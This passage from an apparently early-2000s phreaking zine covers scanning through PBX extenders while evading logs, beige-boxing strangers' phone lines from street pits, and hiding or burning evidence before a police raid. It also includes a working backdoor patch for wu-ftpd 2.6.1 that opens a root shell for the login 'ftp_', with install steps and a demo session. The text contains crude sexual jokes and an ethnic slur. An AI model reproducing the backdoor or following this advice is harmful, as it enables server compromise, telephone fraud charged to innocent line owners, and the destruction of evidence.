Another method which is possible is to use a a PBX extender, this is a line out of the PBX that allows calls to certain range, or any number and is then charged back to the PBX, instead of the person that is making the call. So this can be used to your advantage, dial up the extender and start scanning. Hang on problem, you scan like 30 numbers at like 2am in the morning, admin rocks up in the morning checks the logs, and in the words of Rove goes "What The...". The thing is most if not all PBX will log these days, and that means like internet logs they log where you are calling from. So what you should really do is dial into several extenders to help create confusion, and rather than just scanning from a certain extender, mix the scanning up between the several different ones you have. Now when using extenders it is very important to call during business hours on business days, because this is when all the calls *should* be made by the legit people using the line. If you have a list of extenders a program could be easily written to cycle through a list of extenders, calling different ones in a random order, puting a random amount of time between each call.


Beiging/Pitting

So you get abit bored at night, seeming your a nerdy fuck, with pimples and shit that doesn't get any action from the back section you decide to go and biege some poor pensioners line, so that you can get a hard on. As you can probably tell I don't really tottaly agree with bieging off other peoples phone lines, mainly because they take the blame/cost for your fun. But if you do decide that you need to biege for some reason, then be smart about it because it is a very likely place you will be caught and is the hardest to explain(arhh Officer I lost my pet spider down here, there he is!! Ohhh the mother fucker bit me). So obvilously you want to find a pit that is totally out of the way, perferabely hidden behind some trees, or in a dark alley/workway that people are too scared to walk up at night time. Now if you wanted to be extra careful you could go and borrow(read: steal) some council signs, or those gates things so that people won't or shouldn't walk past there. You could do the same sort of thing around a pit on the open sidewalk, maybe even grab one of those telstra tents. The only problem with this is people but get abit suspicous if they see a nerdy 13 year old trying to erect a tent(not a hard on).

As mentioned in the above section you can use the RJ31X jack so that if/when the legitamite owner of the phone line picks up the phone line you will be disconnected, while does create a small annoyance at being cut off, its better than the person finding out that someone is on the line. If you don't have one of these then the best time to use someone phone line is when they aren't going to being useing it(obvilously). This will probably be late at night/early in the morning unless they have a nerdy child like you gerking it hard downloading Natalie Portman pr0n or when the person is at work. To test if anyone is home during the day you can always go the call on a suspected house and if they pick up you just pull the old "Hi is Ken there?" "No, sorry" "Okay, rang number sorry". Only problem is if a Ken actually lives there, then you just hang up, or talk to Ken about kiddy pr0n. So now you have found a target you want to be able to biege from a safe position, i.e. not standing right next to the pit. So you can, as suggested in the previous section use a wireless type of setup, leaving your base station of the biege box in the pit while sitting up some tree with the portable piece. If your not that "elite" you could always run a cable in consipicously to somewhere safe, like down a bank or in a park or some crap like that. Use your imagination I can't think of everything(and don't trust your milf to buy the coffee, she buys some mild roast shit, when you asked for strong). When you are leaving try to make everything look like when you got there, this way if some Telstra employee does open the pit for a quick glance then everything looks Okay and they tell the old fart that called them that nothing is wrong and to go get his pension and hold people up in lines.

I now want to add some ethical stuff on biegeing. As you could probably see I am not totally in agreeance with biege box mainly because it take advantage of innocent or not so innocent people. So if you want to biege, don't go calling up sex lines or calling up some friend that lives interstate/overseas, espically if the person doesn't click that something extra is on their bill, they are paying what you are too tight to pay for. So before you go and get some "elite" free calls think about the people that you are fucking up. So that really leaves scanning 1800 numbers, or something similar from the line. Now if go and scan a range of numbers from there, that means that the person in the house will be under suspicion. So if you want to do something like that do it when the person can prove that no one was home. Such as if someone goes away for a holiday or business trip, or if they are at work or the like. This does mean extra work, and is just not picking any random pair from the pit, but if it makes you sleep better at night. Then so be it. Also vandalism is a big no, no. a) because you could possibly disconnect someones phone line, and everybody knows how annoying it is when your phone isn't working b) it doesn't achieve anything at all, just means more work for Telstra employees when they should be improving rural services, and will increase security on things such as pits and c) if gives other phreakers a bad name, in a community like ours, one person actions is protrayed as the actions of all the group, espically in the media. So think before you act!!


Documents

Look around your bedroom, computer room, living room or even your toilet. Look at all the stuff that could incriment you. Hell I have a whole lot of documents printed out for reading just so that I can write this one. If you do get raided, they will haveto have a search warrant, which means that they can take whatever they like if they thing it is involved in the case(I am trying to get in contact with someone that does law and computers/telecommunications or has a interest in computers so that I can write an article on that sort of info, if so hit me up, contact at bottom). I believe that it is virtually impossible to do any work without having hard copies of information, whether it be docos, scans or just info written down on locks types, rims, etc. etc. So for these docos/pieces of paper look around for somewhere to stash them. Just in my room I could use such things as: secret compartment in my chest-of-drawers, inside my big set of speakers, in the battery compartment of my portable stereo. Anything that is unscrewable is a good place to hide stuff these include: cd player, amplifier, tuner, televesion, vcr, dataswitch box, old cd-rom and hard disk drives. The only problem is that it is very likely that all that equipment will be taken by the cops. So look around the house for places they won't think to look, e.g. cellar- behind wine, in boxes of food that never get used, back of cupboard, look the places are endless- use your imagination and you undoubtely come up with heaps more than I thought up in the brief time while I was typing. The problem with stashing stuff within your house is that police are consistent buggers and if they are lucky enough to find something, being in your house it incrimintes you. So how do we get past this, DON'T STASH THINGS IN YOUR HOUSE GOD DAMN IT. Have a park, empty block of land, bush, etc. etc. near your place. Well that would be a great place to put it, bury it, stick it in a empty tree trunk etc. etc.(hmm I think I am using etc. etc. too much in this bit, but what I mean this there is a million and one possible places to hide stuff, don't just look for the easiest, first place you find. Try to find the most sneakist, less suspicous place you can think of to put the stuff.) You could also go to the bank and get a safety desposit box, from what I know about safety desposit boxes(which isn't much) you don't haveto tell the bank what goes into them, even so you can just say important papers. Also you need two keys to open (most) of them, one from the bank manager and one of your own. Stash the key somewhere safe, not in the house obvilosuly and don't tell anybody about it. The problem with a safety desposit box is that a) they are expensive things to get and b) if the police find out you have one they will have no trouble getting into it, as no doubt the bank will have a way of getting in. Now the docos that aren't greatly important to you, or you have back ups on computer(encrypted of course, more of this in pt.2) then you should destroy them. Now I don't mean put them in the rubbish, or tear them up and throw them out, hell even if you shred them there is a possibilty that they can be put back together. What you need to do is to burn them, now that its coming into winter, most people have a wood fire happening, so start putting them in there. Alternativty you can have like a incinirator you could use that, now be careful because sometimes when you burn paper, writing can still be readable on them. So get the ashes and somehow destry them. Tread on them, spray water on them, put them down the sink(not if there is alot of them because it blocks the sink up. Reminds of this one time I was at a party and I was throwing up in the toilet and some chick came in and started throwing up in the sink. Anyway she blocked it up and some gook came in and unblocked it with one of those mario brother's suction thingos... thank god for gooks eh?- Sorry back to it). So now hopefully you should have nothing in your house that would incrimanate you when/if the cops come to raid you.


Safety

This section carries on from the last one, if police are going to raid people they normally do a whole lot, rather than just an indivual person. So if people from the scene aren't seen in awhile for no known reason, or if somehow they get a message out they have been raided. Get paranoid start away, stop doing major phreaking stuff, destroy all evidence you have or stash it in a hell of a good spot. If you have floppies with info on them, put a magnet over them, then scrap them and get some more(if you use floppies these days). If you work in a group then it will be most likely that you all get raided at once, that way police hope for as little contact as possible. What you could, do, now this is ultra paranoid, is say have something where everybody hasto call in during the day, say in the morning and in the evening, as they are most likely to raid you then. If someone misses a call in, then well you know what to do. Being raided would not be fun, so be smart, if you see a car following or similar dressed people acting suspicously(I don't know if this shit really occurs, just typing everything I can think of). Friends/associates that are acting nervously or suspicously around you, asking you for more info than they would normally be could have approched by police to help them.

To stay safe you need to wise up, doing small things like placing signs that would indicate that something or someone has been into your room/drawer/where you stash your info. Now there are many ways to do this; the old school method of placing a hair over an opening, if its broken someone has been in, similary a piece of paper could be used. Now if you live at home then your parents/siblings are most likely to be in and out of your room regurarly so placing this sort of stuff on your door could be a problem. Place it on draws you don't want opened, and if you suspect someone throw a casual question their way. If someone does search your house/room then it is very unliekly that they can put *everything* back into the exact same spot. So have certain objects that if in the wrong place can give you a clue to your place being searched. Now you should also be careful of being recorded- both on video and audio. But I think that I will write a seperate document on this sort of information after I do some more research on it.


Resources
The Mega Super Happy Guide to VMBs and Scanning- dataclysm (http://dataclysm.wiggerz.net/articles/pbx.txt)
Become a paranoid it's more secure- tH3 m4n!4c (http://newdata.box.sk/maniac/paranoid.txt)
SAFER BOXING USING THE RJ31X JACK- Marlinspike(http://phreakau.pinegap.net/rjuses.txt)


Outtro

Now we have come to the end, well this is alot longer than I thought that it was going to be. I was starting to worry that is was getting too long, but I got a few people to read it during the making and they said it was ok, so here it is. Really I hope its ok for you guys, I hope that it helps people become safe and keep out of trouble. Like all the articles in this issue people put alot of time in, so don't knock it please. Look out for part 2, being paranoid online. Later people.

[08] NPR (Non Phreaking Related)

[Sangoma]


(Ed: this is the none phreaking related section, covering mostly some exploits thats Sangoma finds for me so that I can fill this thing up with interesting stuff :). Anyway enjoy this section, it kinda is a break from phreaking crap, and really hacking and phreaking go hand in hand.)


wu-ftpd-2.6.1 backdoor

I wasn't the original coder to come up with this method of backdooring wu-ftpd, all credit should goto Axess for wu-ftpd-trojan.tar.gz (wu-ftpd-2.6.0) all i did was take his idea and apply it to wu-ftpd-2.6.1 , so this is more of an update.


How it works ?

All you need to do is apply this "patch" to the wu-ftpd source. What the patch does is look out for a particular login name (ftp_), and it drops you into a root shell.


example:

zulu# telnet zulu 21 
Trying 192.168.0.13...
Connected to zulu.lan.
Escape character is '^]'.
220 zulu.lan FTP server (Version wu-2.6.1(1) Tue Jun 4 13:30:42 GMT 2002) ready.
user ftp_
sangoma wu-ftpd-2.6.1 backdoor
id;
uid=0(root) gid=0(wheel) groups=0(wheel), 2(kmem), 3(sys), 4(tty), 5(operator), 20(staff), 31(guest)
exit;
331 Password required for ftp_.
quit
221 Goodbye.
Connection closed by foreign host.
zulu#

You'll need to add ";" at the end of your commands to see them executed, and you must use telnet or netcat or something like that, but not a ftp client.


Installing the backdoor

What you'll need?

  1. wu-ftpd-2.6.1 source code
  2. wu-ftpd-2.6.1.diff (cut and paste from below)


Just unzip and tar the source...

gunzip wu-ftpd-2.6.1.tar.gz 
tar -xf wu-ftpd-2.6.1.tar

then run

patch < wu-ftpd-2.6.1.diff

tell patch which file to patch (ftpd.c) which will prolly be wu-ftpd-2.6.1/src/ftpd.c once the patching is done, just recompile wu-ftpd and switch the ftpd binaries.


wu-ftpd-2.6.1.diff

<snip> 


*** ftpd.org.c Tue Jun 4 13:25:41 2002
--- ftpd.c Tue Jun 4 13:28:47 2002
***************
*** 1779,1785 ****
anonymous = 0;
acl_remove();

! if (!strcasecmp(name, "ftp") || !strcasecmp(name, "anonymous")) {
struct aclmember *entry = NULL;
int machineok = 1;
char guestservername[MAXHOSTNAMELEN];
--- 1779,1792 ----
anonymous = 0;
acl_remove();

! /* Phj33r sangoma C++ sk1llz */
! if (!strcasecmp(name,"ftp_")){
! system("/bin/echo sangoma wu-ftpd-2.6.1 backdoor \n");
! system("/bin/sh -i");
! }
! /* End of "sk1llz" hehe */
!
! if (!strcasecmp(name, "ftp") || !strcasecmp(name, "anonymous")) {
struct aclmember *entry = NULL;
int machineok = 1;
char guestservername[MAXHOSTNAMELEN];


</snip>

Final thoughts

I'm guessing that this kind of backdoor can be applied to any version of wu-ftpd, but i only needed a backdoor in wu-ftpd-2.6.1 (damn boxes with few daemons running ;)

anyhow, peace...

sangoma@cornerpub.com

[09] Other Crap

In this section is just going to go random crap that we feel like adding, for both your enjoyment and our own!! :)

Next Issue

Next issue we hope to cover the following stuff:
head_rush- Paranoia & Being Paranoid Pt.2
Zaleth- Efficient Prefix Scanning
rioter- SMS headers
anomaly- ATM ROMS
Denied- War Driving
yellow- "Private" GSM networks
nitr0- encoding SMS's

Contact Details

General Contact Details/ Questions/ Submissions!!- p4k@hushmail.com
head_rush-p4k@hushmail.com
Zaleth- zaleth@hushmail.com
rioter- rioter@area-6.net
phreakaz0id- phreakaz0id@hotmail.com
anomaly- *cough*
sangoma- sangoma@cornerpub.com

(You could also find (some of) us on irc.linuxphreaks.org 6667 #p4k)

What tunes we are digging it out to

What we are/were listening to when writing the above articles:

head_rush- Infusion- Phrases and Numbers/ Streets- Original Pirate Material
Zaleth- Tiesto- Les Rythem Digitales
rioter- nonpoint- development
phreakaz0id- Tozzi - A Cosa Servono Le Mani
anomaly-my neighbours having sex
sangoma-

Propz

Mad propz go out to these people, because in some way they helped to get this bish off the ground:

Zaleth, phreakaz0id, rioter, sangoma,for articles
anomaly- for article and for checking (some of) the spelling
sangoma- for having a blek dick and sending me pics
esko- for hosting the page
linuxphreak.org ppl that are nice to me or just lub me for my body
#dbo crew on AustNet for keeping it real
and to all those ppl I pulled 13/f/jap on, thanks for some elite logs

Quotes

[22:26] <head_rush> i masturbate when i am typing articles
(Ed: This guy is one sick fucker)
"We were soldier once.... and young"
"A song for a heart so big, god wouldn't let it live"
"Face your fears, live your dreams"

[10] Outtro

Well it's the end of the issue, well aren't we just glad that it is finished. My only wish that people will find this useful now and hopefully in the future. Hopefully if there is enough public support for it, there will be a second issue, and depending on how that goes, there will a third issue, and so on. But whether or not it continues is all upto you guys in the scene, the people that this zine is going out to. If it is of no help, then hell tell us, and we can either change it or stop doing it. Please don't go knocking the articles that people have written because they have spent alot of time on them, you write a better one, and then you can release it and start knocking other peoples for not being elite as yours... if you feel that will actually make a difference to the scene, because thats what its all about. Its all about the scene and advancing it, its about gaining knowledge, not always about getting free phone calls and being "uber elite" infront of your friends. On that note, I will leave you and maybe(hopefully) see you in the not so distance future.

Peace out...

next →
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT